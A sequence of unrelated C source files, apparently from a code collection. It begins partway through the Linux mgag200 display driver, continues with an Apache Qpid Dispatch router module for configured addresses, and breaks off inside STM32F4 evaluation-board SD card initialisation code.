(mga_vga_calculate_mode_bandwidth(mode, bpp) > (55000 * 1024)) return MODE_BANDWIDTH; } } else if (mdev->type == G200_WB) { if (mode->hdisplay > 1280) return MODE_VIRTUAL_X; if (mode->vdisplay > 1024) return MODE_VIRTUAL_Y; if (mga_vga_calculate_mode_bandwidth(mode, bpp) > (31877 * 1024)) return MODE_BANDWIDTH; } else if (mdev->type == G200_EV && (mga_vga_calculate_mode_bandwidth(mode, bpp) > (32700 * 1024))) { return MODE_BANDWIDTH; } else if (mdev->type == G200_EH && (mga_vga_calculate_mode_bandwidth(mode, bpp) > (37500 * 1024))) { return MODE_BANDWIDTH; } else if (mdev->type == G200_ER && (mga_vga_calculate_mode_bandwidth(mode, bpp) > (55000 * 1024))) { return MODE_BANDWIDTH; } if ((mode->hdisplay % 8) != 0 || (mode->hsync_start % 8) != 0 || (mode->hsync_end % 8) != 0 || (mode->htotal % 8) != 0) { return MODE_H_ILLEGAL; } if (mode->crtc_hdisplay > 2048 || mode->crtc_hsync_start > 4096 || mode->crtc_hsync_end > 4096 || mode->crtc_htotal > 4096 || mode->crtc_vdisplay > 2048 || mode->crtc_vsync_start > 4096 || mode->crtc_vsync_end > 4096 || mode->crtc_vtotal > 4096) { return MODE_BAD; } /* Validate the mode input by the user */ if (connector->cmdline_mode.specified) { if (connector->cmdline_mode.bpp_specified) bpp = connector->cmdline_mode.bpp; } if ((mode->hdisplay * mode->vdisplay * (bpp/8)) > mdev->vram_fb_available) { if (connector->cmdline_mode.specified) connector->cmdline_mode.specified = false; return MODE_BAD; } return MODE_OK; } static void mga_connector_destroy(struct drm_connector *connector) { struct mga_connector *mga_connector = to_mga_connector(connector); mgag200_i2c_destroy(mga_connector->i2c); drm_connector_cleanup(connector); } static const struct drm_connector_helper_funcs mga_vga_connector_helper_funcs = { .get_modes = mga_vga_get_modes, .mode_valid = mga_vga_mode_valid, }; static const struct drm_connector_funcs mga_vga_connector_funcs = { .reset = drm_atomic_helper_connector_reset, .fill_modes = drm_helper_probe_single_connector_modes, .destroy = mga_connector_destroy, .atomic_duplicate_state = drm_atomic_helper_connector_duplicate_state, .atomic_destroy_state = drm_atomic_helper_connector_destroy_state, }; static int mgag200_vga_connector_init(struct mga_device *mdev) { struct drm_device *dev = &mdev->base; struct mga_connector *mconnector = &mdev->connector; struct drm_connector *connector = &mconnector->base; struct mga_i2c_chan *i2c; int ret; i2c = mgag200_i2c_create(dev); if (!i2c) drm_warn(dev, "failed to add DDC bus\n"); ret = drm_connector_init_with_ddc(dev, connector, &mga_vga_connector_funcs, DRM_MODE_CONNECTOR_VGA, &i2c->adapter); if (ret) goto err_mgag200_i2c_destroy; drm_connector_helper_add(connector, &mga_vga_connector_helper_funcs); mconnector->i2c = i2c; return 0; err_mgag200_i2c_destroy: mgag200_i2c_destroy(i2c); return ret; } /* * Simple Display Pipe */ static enum drm_mode_status mgag200_simple_display_pipe_mode_valid(struct drm_simple_display_pipe *pipe, const struct drm_display_mode *mode) { return MODE_OK; } static void mgag200_handle_damage(struct mga_device *mdev, struct drm_framebuffer *fb, struct drm_rect *clip) { struct drm_device *dev = &mdev->base; void *vmap; vmap = drm_gem_shmem_vmap(fb->obj[0]); if (drm_WARN_ON(dev, !vmap)) return; /* BUG: SHMEM BO should always be vmapped */ drm_fb_memcpy_dstclip(mdev->vram, vmap, fb, clip); drm_gem_shmem_vunmap(fb->obj[0], vmap); /* Always scanout image at VRAM offset 0 */ mgag200_set_startadd(mdev, (u32)0); mgag200_set_offset(mdev, fb); } static void mgag200_simple_display_pipe_enable(struct drm_simple_display_pipe *pipe, struct drm_crtc_state *crtc_state, struct drm_plane_state *plane_state) { struct drm_crtc *crtc = &pipe->crtc; struct drm_device *dev = crtc->dev; struct mga_device *mdev = to_mga_device(dev); struct drm_display_mode *adjusted_mode = &crtc_state->adjusted_mode; struct drm_framebuffer *fb = plane_state->fb; struct drm_rect fullscreen = { .x1 = 0, .x2 = fb->width, .y1 = 0, .y2 = fb->height, }; if (mdev->type == G200_WB || mdev->type == G200_EW3) mgag200_g200wb_hold_bmc(mdev); mgag200_set_format_regs(mdev, fb); mgag200_set_mode_regs(mdev, adjusted_mode); mgag200_crtc_set_plls(mdev, adjusted_mode->clock); if (mdev->type == G200_ER) mgag200_g200er_reset_tagfifo(mdev); if (IS_G200_SE(mdev)) mgag200_g200se_set_hiprilvl(mdev, adjusted_mode, fb); else if (mdev->type == G200_EV) mgag200_g200ev_set_hiprilvl(mdev); if (mdev->type == G200_WB || mdev->type == G200_EW3) mgag200_g200wb_release_bmc(mdev); mga_crtc_load_lut(crtc); mgag200_enable_display(mdev); mgag200_handle_damage(mdev, fb, &fullscreen); } static void mgag200_simple_display_pipe_disable(struct drm_simple_display_pipe *pipe) { struct drm_crtc *crtc = &pipe->crtc; struct mga_device *mdev = to_mga_device(crtc->dev); mgag200_disable_display(mdev); } static int mgag200_simple_display_pipe_check(struct drm_simple_display_pipe *pipe, struct drm_plane_state *plane_state, struct drm_crtc_state *crtc_state) { struct drm_plane *plane = plane_state->plane; struct drm_framebuffer *new_fb = plane_state->fb; struct drm_framebuffer *fb = NULL; if (!new_fb) return 0; if (plane->state) fb = plane->state->fb; if (!fb || (fb->format != new_fb->format)) crtc_state->mode_changed = true; /* update PLL settings */ return 0; } static void mgag200_simple_display_pipe_update(struct drm_simple_display_pipe *pipe, struct drm_plane_state *old_state) { struct drm_plane *plane = &pipe->plane; struct drm_device *dev = plane->dev; struct mga_device *mdev = to_mga_device(dev); struct drm_plane_state *state = plane->state; struct drm_framebuffer *fb = state->fb; struct drm_rect damage; if (!fb) return; if (drm_atomic_helper_damage_merged(old_state, state, &damage)) mgag200_handle_damage(mdev, fb, &damage); } static const struct drm_simple_display_pipe_funcs mgag200_simple_display_pipe_funcs = { .mode_valid = mgag200_simple_display_pipe_mode_valid, .enable = mgag200_simple_display_pipe_enable, .disable = mgag200_simple_display_pipe_disable, .check = mgag200_simple_display_pipe_check, .update = mgag200_simple_display_pipe_update, .prepare_fb = drm_gem_fb_simple_display_pipe_prepare_fb, }; static const uint32_t mgag200_simple_display_pipe_formats[] = { DRM_FORMAT_XRGB8888, DRM_FORMAT_RGB565, DRM_FORMAT_RGB888, }; static const uint64_t mgag200_simple_display_pipe_fmtmods[] = { DRM_FORMAT_MOD_LINEAR, DRM_FORMAT_MOD_INVALID }; /* * Mode config */ static const struct drm_mode_config_funcs mgag200_mode_config_funcs = { .fb_create = drm_gem_fb_create_with_dirty, .atomic_check = drm_atomic_helper_check, .atomic_commit = drm_atomic_helper_commit, }; static unsigned int mgag200_preferred_depth(struct mga_device *mdev) { if (IS_G200_SE(mdev) && mdev->vram_fb_available < (2048*1024)) return 16; else return 32; } int mgag200_modeset_init(struct mga_device *mdev) { struct drm_device *dev = &mdev->base; struct drm_connector *connector = &mdev->connector.base; struct drm_simple_display_pipe *pipe = &mdev->display_pipe; size_t format_count = ARRAY_SIZE(mgag200_simple_display_pipe_formats); int ret; mdev->bpp_shifts[0] = 0; mdev->bpp_shifts[1] = 1; mdev->bpp_shifts[2] = 0; mdev->bpp_shifts[3] = 2; mgag200_init_regs(mdev); ret = drmm_mode_config_init(dev); if (ret) { drm_err(dev, "drmm_mode_config_init() failed, error %d\n", ret); return ret; } dev->mode_config.max_width = MGAG200_MAX_FB_WIDTH; dev->mode_config.max_height = MGAG200_MAX_FB_HEIGHT; dev->mode_config.preferred_depth = mgag200_preferred_depth(mdev); dev->mode_config.fb_base = mdev->mc.vram_base; dev->mode_config.funcs = &mgag200_mode_config_funcs; ret = mgag200_vga_connector_init(mdev); if (ret) { drm_err(dev, "mgag200_vga_connector_init() failed, error %d\n", ret); return ret; } ret = drm_simple_display_pipe_init(dev, pipe, &mgag200_simple_display_pipe_funcs, mgag200_simple_display_pipe_formats, format_count, mgag200_simple_display_pipe_fmtmods, connector); if (ret) { drm_err(dev, "drm_simple_display_pipe_init() failed, error %d\n", ret); return ret; } /* FIXME: legacy gamma tables; convert to CRTC state */ drm_mode_crtc_set_gamma_size(&pipe->crtc, MGAG200_LUT_SIZE); drm_mode_config_reset(dev); return 0; }
935358.c
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ #include <qpid/dispatch/ctools.h> #include "agent_config_address.h" #include <inttypes.h> #include <stdio.h> #define QDR_CONFIG_ADDRESS_NAME 0 #define QDR_CONFIG_ADDRESS_IDENTITY 1 #define QDR_CONFIG_ADDRESS_TYPE 2 #define QDR_CONFIG_ADDRESS_PREFIX 3 #define QDR_CONFIG_ADDRESS_DISTRIBUTION 4 #define QDR_CONFIG_ADDRESS_WAYPOINT 5 #define QDR_CONFIG_ADDRESS_IN_PHASE 6 #define QDR_CONFIG_ADDRESS_OUT_PHASE 7 #define QDR_CONFIG_ADDRESS_PATTERN 8 #define QDR_CONFIG_ADDRESS_PRIORITY 9 #define QDR_CONFIG_ADDRESS_FALLBACK 10 const char *qdr_config_address_columns[] = {"name", "identity", "type", "prefix", "distribution", "waypoint", "ingressPhase", "egressPhase", "pattern", "priority", "fallback", 0}; const char *CONFIG_ADDRESS_TYPE = "org.apache.qpid.dispatch.router.config.address"; const char CONFIG_ADDRESS_PREFIX = 'C'; static void qdr_config_address_insert_column_CT(qdr_address_config_t *addr, int col, qd_composed_field_t *body, bool as_map) { const char *text = 0; if (as_map) qd_compose_insert_string(body, qdr_config_address_columns[col]); switch(col) { case QDR_CONFIG_ADDRESS_NAME: if (addr->name) qd_compose_insert_string(body, addr->name); else qd_compose_insert_null(body); break; case QDR_CONFIG_ADDRESS_IDENTITY: { char id_str[100]; snprintf(id_str, 100, "%"PRId64, addr->identity); qd_compose_insert_string(body, id_str); break; } case QDR_CONFIG_ADDRESS_TYPE: qd_compose_insert_string(body, CONFIG_ADDRESS_TYPE); break; case QDR_CONFIG_ADDRESS_PREFIX: if (addr->is_prefix && addr->pattern) { // Note (kgiusti): internally we prepend a '/#' to the configured // prefix and treat it like a pattern. Remove trailing '/#' to put // it back into its original form const size_t len = strlen(addr->pattern); assert(len > 1); qd_compose_insert_string_n(body, addr->pattern, len - 2); } else qd_compose_insert_null(body); break; case QDR_CONFIG_ADDRESS_PATTERN: if (!addr->is_prefix && addr->pattern) qd_compose_insert_string(body, addr->pattern); else qd_compose_insert_null(body); break; case QDR_CONFIG_ADDRESS_DISTRIBUTION: switch (addr->treatment) { case QD_TREATMENT_MULTICAST_FLOOD: case QD_TREATMENT_MULTICAST_ONCE: text = "multicast"; break; case QD_TREATMENT_ANYCAST_CLOSEST: text = "closest"; break; case QD_TREATMENT_ANYCAST_BALANCED: text = "balanced"; break; default: text = 0; } if (text) qd_compose_insert_string(body, text); else qd_compose_insert_null(body); break; case QDR_CONFIG_ADDRESS_WAYPOINT: qd_compose_insert_bool(body, addr->in_phase == 0 && addr->out_phase == 1); break; case QDR_CONFIG_ADDRESS_IN_PHASE: qd_compose_insert_int(body, addr->in_phase); break; case QDR_CONFIG_ADDRESS_OUT_PHASE: qd_compose_insert_int(body, addr->out_phase); break; case QDR_CONFIG_ADDRESS_PRIORITY: qd_compose_insert_int(body, addr->priority); break; case QDR_CONFIG_ADDRESS_FALLBACK: qd_compose_insert_bool(body, addr->fallback); break; } } static void qdr_agent_write_config_address_CT(qdr_query_t *query, qdr_address_config_t *addr) { qd_composed_field_t *body = query->body; qd_compose_start_list(body); int i = 0; while (query->columns[i] >= 0) { qdr_config_address_insert_column_CT(addr, query->columns[i], body, false); i++; } qd_compose_end_list(body); } static void qdr_manage_advance_config_address_CT(qdr_query_t *query, qdr_address_config_t *addr) { if (addr) { addr = DEQ_NEXT(addr); query->more = !!addr; query->next_offset++; } else { query->more = false; } } void qdra_config_address_get_first_CT(qdr_core_t *core, qdr_query_t *query, int offset) { // // Queries that get this far will always succeed. // query->status = QD_AMQP_OK; // // If the offset goes beyond the set of objects, end the query now. // if (offset >= DEQ_SIZE(core->addr_config)) { query->more = false; qdr_agent_enqueue_response_CT(core, query); return; } // // Run to the object at the offset. // qdr_address_config_t *addr = DEQ_HEAD(core->addr_config); for (int i = 0; i < offset && addr; i++) addr = DEQ_NEXT(addr); assert(addr); if (addr) { // // Write the columns of the object into the response body. // qdr_agent_write_config_address_CT(query, addr); // // Advance to the next address // query->next_offset = offset; qdr_manage_advance_config_address_CT(query, addr); } else { query->more = false; } // // Enqueue the response. // qdr_agent_enqueue_response_CT(core, query); } void qdra_config_address_get_next_CT(qdr_core_t *core, qdr_query_t *query) { qdr_address_config_t *addr = 0; if (query->next_offset < DEQ_SIZE(core->addr_config)) { addr = DEQ_HEAD(core->addr_config); if (!addr) { query->more = false; qdr_agent_enqueue_response_CT(core, query); return; } for (int i = 0; i < query->next_offset && addr; i++) addr = DEQ_NEXT(addr); } if (addr) { // // Write the columns of the addr entity into the response body. // qdr_agent_write_config_address_CT(query, addr); // // Advance to the next object // qdr_manage_advance_config_address_CT(query, addr); } else query->more = false; // // Enqueue the response. // qdr_agent_enqueue_response_CT(core, query); } static qd_address_treatment_t qdra_address_treatment_CT(qd_parsed_field_t *field) { if (field) { qd_iterator_t *iter = qd_parse_raw(field); if (qd_iterator_equal(iter, (unsigned char*) "multicast")) return QD_TREATMENT_MULTICAST_ONCE; if (qd_iterator_equal(iter, (unsigned char*) "closest")) return QD_TREATMENT_ANYCAST_CLOSEST; if (qd_iterator_equal(iter, (unsigned char*) "balanced")) return QD_TREATMENT_ANYCAST_BALANCED; if (qd_iterator_equal(iter, (unsigned char*) "unavailable")) return QD_TREATMENT_UNAVAILABLE; } return QD_TREATMENT_ANYCAST_BALANCED; } static qdr_address_config_t *qdr_address_config_find_by_identity_CT(qdr_core_t *core, qd_iterator_t *identity) { if (!identity) return 0; qdr_address_config_t *rc = DEQ_HEAD(core->addr_config); while (rc) { // Convert the passed in identity to a char* char id[100]; snprintf(id, 100, "%"PRId64, rc->identity); if (qd_iterator_equal(identity, (const unsigned char*) id)) break; rc = DEQ_NEXT(rc); } return rc; } static qdr_address_config_t *qdr_address_config_find_by_name_CT(qdr_core_t *core, qd_iterator_t *name) { if (!name) return 0; qdr_address_config_t *rc = DEQ_HEAD(core->addr_config); while (rc) { // Sometimes the name can be null if (rc->name && qd_iterator_equal(name, (const unsigned char*) rc->name)) break; rc = DEQ_NEXT(rc); } return rc; } void qdra_config_address_delete_CT(qdr_core_t *core, qdr_query_t *query, qd_iterator_t *name, qd_iterator_t *identity) { qdr_address_config_t *addr = 0; if (!name && !identity) { query->status = QD_AMQP_BAD_REQUEST; query->status.description = "No name or identity provided"; qd_log(core->agent_log, QD_LOG_ERROR, "Error performing DELETE of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); } else { if (identity) addr = qdr_address_config_find_by_identity_CT(core, identity); else if (name) addr = qdr_address_config_find_by_name_CT(core, name); if (addr) { qdr_core_remove_address_config(core, addr); query->status = QD_AMQP_NO_CONTENT; } else query->status = QD_AMQP_NOT_FOUND; } // // Enqueue the response. // qdr_agent_enqueue_response_CT(core, query); } void qdra_config_address_create_CT(qdr_core_t *core, qd_iterator_t *name, qdr_query_t *query, qd_parsed_field_t *in_body) { char *pattern = NULL; while (true) { // // Ensure there isn't a duplicate name // qdr_address_config_t *addr = 0; if (name) { qd_iterator_view_t iter_view = qd_iterator_get_view(name); qd_iterator_annotate_prefix(name, CONFIG_ADDRESS_PREFIX); qd_iterator_reset_view(name, ITER_VIEW_ADDRESS_HASH); qd_hash_retrieve(core->addr_lr_al_hash, name, (void**) &addr); qd_iterator_reset_view(name, iter_view); } if (!!addr) { query->status = QD_AMQP_BAD_REQUEST; query->status.description = "Name conflicts with an existing entity"; qd_log(core->agent_log, QD_LOG_ERROR, "Error performing CREATE of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); break; } // Ensure that the body is a map if (!qd_parse_is_map(in_body)) { query->status = QD_AMQP_BAD_REQUEST; query->status.description = "Body of request must be a map"; qd_log(core->agent_log, QD_LOG_ERROR, "Error performing CREATE of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); break; } // // Extract the fields from the request // qd_parsed_field_t *prefix_field = qd_parse_value_by_key(in_body, qdr_config_address_columns[QDR_CONFIG_ADDRESS_PREFIX]); qd_parsed_field_t *pattern_field = qd_parse_value_by_key(in_body, qdr_config_address_columns[QDR_CONFIG_ADDRESS_PATTERN]); qd_parsed_field_t *distrib_field = qd_parse_value_by_key(in_body, qdr_config_address_columns[QDR_CONFIG_ADDRESS_DISTRIBUTION]); qd_parsed_field_t *waypoint_field = qd_parse_value_by_key(in_body, qdr_config_address_columns[QDR_CONFIG_ADDRESS_WAYPOINT]); qd_parsed_field_t *in_phase_field = qd_parse_value_by_key(in_body, qdr_config_address_columns[QDR_CONFIG_ADDRESS_IN_PHASE]); qd_parsed_field_t *out_phase_field = qd_parse_value_by_key(in_body, qdr_config_address_columns[QDR_CONFIG_ADDRESS_OUT_PHASE]); qd_parsed_field_t *priority_field = qd_parse_value_by_key(in_body, qdr_config_address_columns[QDR_CONFIG_ADDRESS_PRIORITY]); qd_parsed_field_t *fallback_field = qd_parse_value_by_key(in_body, qdr_config_address_columns[QDR_CONFIG_ADDRESS_FALLBACK]); bool waypoint = waypoint_field ? qd_parse_as_bool(waypoint_field) : false; long in_phase = in_phase_field ? qd_parse_as_long(in_phase_field) : -1; long out_phase = out_phase_field ? qd_parse_as_long(out_phase_field) : -1; long priority = priority_field ? qd_parse_as_long(priority_field) : -1; bool fallback = fallback_field ? qd_parse_as_bool(fallback_field) : false; // // Either a prefix or a pattern field is mandatory. Prefix and pattern // are mutually exclusive. Fail if either both or none are given. // const char *msg = NULL; if (!prefix_field && !pattern_field) { msg = "Either a 'prefix' or 'pattern' attribute must be provided"; } else if (prefix_field && pattern_field) { msg = "Cannot specify both a 'prefix' and a 'pattern' attribute"; } if (fallback && (waypoint || in_phase > 0 || out_phase > 0)) { msg = "Fallback cannot be specified with waypoint or non-zero ingress and egress phases"; } if (msg) { query->status = QD_AMQP_BAD_REQUEST; query->status.description = msg; qd_log(core->agent_log, QD_LOG_ERROR, "Error performing CREATE of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); break; } // validate the pattern/prefix, add "/#" if prefix pattern = qdra_config_address_validate_pattern_CT((prefix_field) ? prefix_field : pattern_field, !!prefix_field, &msg); if (!pattern) { query->status = QD_AMQP_BAD_REQUEST; query->status.description = msg; qd_log(core->agent_log, QD_LOG_ERROR, "Error performing CREATE of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); break; } // // Handle the address-phasing logic. If the phases are provided, use them. Otherwise // use the waypoint flag to set the most common defaults. // if (in_phase == -1 && out_phase == -1) { in_phase = 0; out_phase = waypoint ? 1 : 0; } // // Validate the phase values // if (in_phase < 0 || in_phase > 9 || out_phase < 0 || out_phase > 9) { query->status = QD_AMQP_BAD_REQUEST; query->status.description = "Phase values must be between 0 and 9"; qd_log(core->agent_log, QD_LOG_ERROR, "Error performing CREATE of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); break; } // // Validate the priority values. // if (priority > QDR_MAX_PRIORITY ) { query->status = QD_AMQP_BAD_REQUEST; query->status.description = "Priority value, if present, must be between 0 and QDR_MAX_PRIORITY"; qd_log(core->agent_log, QD_LOG_ERROR, "Error performing CREATE of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); break; } // // The request is valid. Attempt to insert the address pattern into // the parse tree, fail if there is already an entry for that pattern // addr = new_qdr_address_config_t(); if (!addr) { query->status = QD_AMQP_BAD_REQUEST; query->status.description = "Out of memory"; qd_log(core->agent_log, QD_LOG_ERROR, "Error performing CREATE of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); break; } ZERO(addr); // // Insert the uninitialized address to check if it already exists in // the parse tree. On success initialize it. This is thread safe // since the current thread (core) is the only thread allowed to use // the parse tree // qd_error_t rc = qd_parse_tree_add_pattern_str(core->addr_parse_tree, pattern, addr); if (rc) { free_qdr_address_config_t(addr); query->status = QD_AMQP_BAD_REQUEST; query->status.description = qd_error_name(rc); qd_log(core->agent_log, QD_LOG_ERROR, "Error performing CREATE of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); break; } addr->ref_count = 1; // Represents the reference from the addr_config list addr->name = name ? (char*) qd_iterator_copy(name) : 0; addr->identity = qdr_identifier(core); addr->treatment = qdra_address_treatment_CT(distrib_field); addr->in_phase = in_phase; addr->out_phase = out_phase; addr->is_prefix = !!prefix_field; addr->pattern = pattern; addr->priority = priority; addr->fallback = fallback; pattern = 0; DEQ_INSERT_TAIL(core->addr_config, addr); if (name) { qd_iterator_view_t iter_view = qd_iterator_get_view(name); qd_iterator_reset_view(name, ITER_VIEW_ADDRESS_HASH); qd_hash_insert(core->addr_lr_al_hash, name, addr, &addr->hash_handle); qd_iterator_reset_view(name, iter_view); } // // Compose the result map for the response. // if (query->body) { qd_compose_start_map(query->body); for (int col = 0; col < QDR_CONFIG_ADDRESS_COLUMN_COUNT; col++) qdr_config_address_insert_column_CT(addr, col, query->body, true); qd_compose_end_map(query->body); } query->status = QD_AMQP_CREATED; break; } // // Enqueue the response if there is a body. If there is no body, this is a management // operation created internally by the configuration file parser. // if (query->body) { // // If there was an error in processing the create, insert a NULL value into the body. // if (query->status.status / 100 > 2) qd_compose_insert_null(query->body); qdr_agent_enqueue_response_CT(core, query); } else qdr_query_free(query); free(pattern); } static void qdr_manage_write_config_address_map_CT(qdr_core_t *core, qdr_address_config_t *addr, qd_composed_field_t *body, const char *qdr_config_address_columns[]) { qd_compose_start_map(body); for(int i = 0; i < QDR_CONFIG_ADDRESS_COLUMN_COUNT; i++) { qd_compose_insert_string(body, qdr_config_address_columns[i]); qdr_config_address_insert_column_CT(addr, i, body, false); } qd_compose_end_map(body); } void qdra_config_address_get_CT(qdr_core_t *core, qd_iterator_t *name, qd_iterator_t *identity, qdr_query_t *query, const char *qdr_config_address_columns[]) { qdr_address_config_t *addr = 0; if (!name && !identity) { query->status = QD_AMQP_BAD_REQUEST; query->status.description = "No name or identity provided"; qd_log(core->agent_log, QD_LOG_ERROR, "Error performing READ of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); } else { if (identity) //If there is identity, ignore the name addr = qdr_address_config_find_by_identity_CT(core, identity); else if (name) addr = qdr_address_config_find_by_name_CT(core, name); if (addr == 0) { // Send back a 404 query->status = QD_AMQP_NOT_FOUND; } else { // // Write the columns of the address entity into the response body. // qdr_manage_write_config_address_map_CT(core, addr, query->body, qdr_config_address_columns); query->status = QD_AMQP_OK; } } // // Enqueue the response. // qdr_agent_enqueue_response_CT(core, query); } // given an address pattern parsed field, validate it and convert it to a string char *qdra_config_address_validate_pattern_CT(qd_parsed_field_t *pattern_field, bool is_prefix, const char **error) { char *buf = NULL; char *pattern = NULL; uint8_t tag = qd_parse_tag(pattern_field); qd_iterator_t *p_iter = qd_parse_raw(pattern_field); int len = qd_iterator_length(p_iter); *error = NULL; if ((tag != QD_AMQP_STR8_UTF8 && tag != QD_AMQP_STR32_UTF8) || len == 0) { *error = ((is_prefix) ? "Prefix must be a non-empty string type" : "Pattern must be a non-empty string type"); goto exit; } buf = (char *)qd_iterator_copy(p_iter); char *begin = buf; // strip leading token separators // note: see parse_tree.c for acceptable separator characters while (*begin && strchr("./", *begin)) begin++; // strip trailing separators while (*begin) { char *end = &begin[strlen(begin) - 1]; if (!strchr("./", *end)) break; *end = 0; } if (*begin == 0) { *error = ((is_prefix) ? "Prefix invalid - no tokens" : "Pattern invalid - no tokens"); goto exit; } if (is_prefix) { // convert a prefix match into a valid pattern by appending "/#" pattern = malloc(strlen(begin) + 3); strcpy(pattern, begin); strcat(pattern, "/#"); } else { pattern = strdup(begin); } exit: free(buf); return pattern; }
300869.c
/** ****************************************************************************** * @file STM324x7i_eval.c * @author MCD Application Team * @version V1.0.0 * @date 11-January-2013 * @brief This file provides * - set of firmware functions to manage Leds, push-button and COM ports * - low level initialization functions for SD card (on SDIO) and * serial EEPROM (sEE) * available on STM324x7I-EVAL evaluation board(MB786) from * STMicroelectronics. ****************************************************************************** * @attention * * <h2><center>&copy; COPYRIGHT 2013 STMicroelectronics</center></h2> * * Licensed under MCD-ST Liberty SW License Agreement V2, (the "License"); * You may not use this file except in compliance with the License. * You may obtain a copy of the License at: * * http://www.st.com/software_license_agreement_liberty_v2 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * ****************************************************************************** */ /* Includes ------------------------------------------------------------------*/ #include "stm32f4xx_dma.h" #include "stm32f4xx_exti.h" #include "stm32f4xx_gpio.h" #include "stm32f4xx_rcc.h" #include "stm32f4xx_sdio.h" //#include "stm32f4xx_syscfg.h" #include "stm_misc.h" #include "stm324x7i_eval.h" //#include "stm32f4xx_i2c.h" /** * @brief DeInitializes the SDIO interface. * @param None * @retval None */ void SD_LowLevel_DeInit(void) { GPIO_InitTypeDef GPIO_InitStructure; /*!< Disable SDIO Clock */ SDIO_ClockCmd(DISABLE); /*!< Set Power State to OFF */ SDIO_SetPowerState(SDIO_PowerState_OFF); /*!< DeInitializes the SDIO peripheral */ SDIO_DeInit(); /* Disable the SDIO APB2 Clock */ RCC_APB2PeriphClockCmd(RCC_APB2Periph_SDIO, DISABLE); GPIO_PinAFConfig(GPIOC, GPIO_PinSource8, GPIO_AF_MCO); GPIO_PinAFConfig(GPIOC, GPIO_PinSource9, GPIO_AF_MCO); GPIO_PinAFConfig(GPIOC, GPIO_PinSource10, GPIO_AF_MCO); GPIO_PinAFConfig(GPIOC, GPIO_PinSource11, GPIO_AF_MCO); GPIO_PinAFConfig(GPIOC, GPIO_PinSource12, GPIO_AF_MCO); GPIO_PinAFConfig(GPIOD, GPIO_PinSource2, GPIO_AF_MCO); /* Configure PC.08, PC.09, PC.10, PC.11 pins: D0, D1, D2, D3 pins */ GPIO_InitStructure.GPIO_Pin = GPIO_Pin_8 | GPIO_Pin_9 | GPIO_Pin_10 | GPIO_Pin_11; GPIO_InitStructure.GPIO_Mode = GPIO_Mode_IN; GPIO_InitStructure.GPIO_PuPd = GPIO_PuPd_NOPULL; GPIO_Init(GPIOC, &GPIO_InitStructure); /* Configure PD.02 CMD line */ GPIO_InitStructure.GPIO_Pin = GPIO_Pin_2; GPIO_Init(GPIOD, &GPIO_InitStructure); /* Configure PC.12 pin: CLK pin */ GPIO_InitStructure.GPIO_Pin = GPIO_Pin_12; GPIO_Init(GPIOC, &GPIO_InitStructure); } /* Init just the detect pin. * This is so we can save power by not enabling the whole SD card interface, * yet still detect when a card is inserted. */ void SD_LowLevel_Init_Detect(void) { /* Periph clock enable */ RCC_AHB1PeriphClockCmd(SD_DETECT_GPIO_CLK, ENABLE); /*!< Configure SD_SPI_DETECT_PIN pin: SD Card detect pin */ #if defined(PYBOARD3) // dpgeorge: PYBv2-v3: switch is normally open, connected to VDD when card inserted GPIO_InitTypeDef GPIO_InitStructure; GPIO_InitStructure.GPIO_Pin = SD_DETECT_PIN; GPIO_InitStructure.GPIO_Speed = GPIO_Speed_2MHz; // needs to be 2MHz due to restrictions on PC13 GPIO_InitStructure.GPIO_Mode = GPIO_Mode_IN; GPIO_InitStructure.GPIO_PuPd = GPIO_PuPd_DOWN; GPIO_Init(SD_DETECT_GPIO_PORT, &GPIO_InitStructure); #elif defined(PYBOARD4) // dpgeorge: PYBv4: switch is normally open, connected to GND when card inserted GPIO_InitTypeDef GPIO_InitStructure; GPIO_InitStructure.GPIO_Pin = SD_DETECT_PIN; GPIO_InitStructure.GPIO_Speed = GPIO_Speed_2MHz; GPIO_InitStructure.GPIO_Mode = GPIO_Mode_IN; GPIO_InitStructure.GPIO_PuPd = GPIO_PuPd_UP; GPIO_Init(SD_DETECT_GPIO_PORT, &GPIO_InitStructure); #endif } /** * @brief Initializes the SD Card and put it into StandBy State (Ready for * data transfer). * @param None * @retval None */ void SD_LowLevel_Init(void) { // init the detect pin first SD_LowLevel_Init_Detect(); GPIO_InitTypeDef GPIO_InitStructure; /* GPIOC and GPIOD Periph clock enable */ RCC_AHB1PeriphClockCmd(RCC_AHB1Periph_GPIOC | RCC_AHB1Periph_GPIOD | SD_DETECT_GPIO_CLK, ENABLE); GPIO_PinAFConfig(GPIOC, GPIO_PinSource8, GPIO_AF_SDIO); GPIO_PinAFConfig(GPIOC, GPIO_PinSource9, GPIO_AF_SDIO); GPIO_PinAFConfig(GPIOC, GPIO_PinSource10, GPIO_AF_SDIO); GPIO_PinAFConfig(GPIOC, GPIO_PinSource11, GPIO_AF_SDIO); GPIO_PinAFConfig(GPIOC, GPIO_PinSource12, GPIO_AF_SDIO); GPIO_PinAFConfig(GPIOD, GPIO_PinSource2, GPIO_AF_SDIO); /* Configure PC.08, PC.09, PC.10, PC.11 pins: D0, D1, D2, D3 pins */ GPIO_InitStructure.GPIO_Pin = GPIO_Pin_8 | GPIO_Pin_9 | GPIO_Pin_10 | GPIO_Pin_11; GPIO_InitStructure.GPIO_Speed = GPIO_Speed_25MHz; GPIO_InitStructure.GPIO_Mode = GPIO_Mode_AF; GPIO_InitStructure.GPIO_OType = GPIO_OType_PP; GPIO_InitStructure.GPIO_PuPd = GPIO_PuPd_UP; GPIO_Init(GPIOC, &GPIO_InitStructure); /* Configure 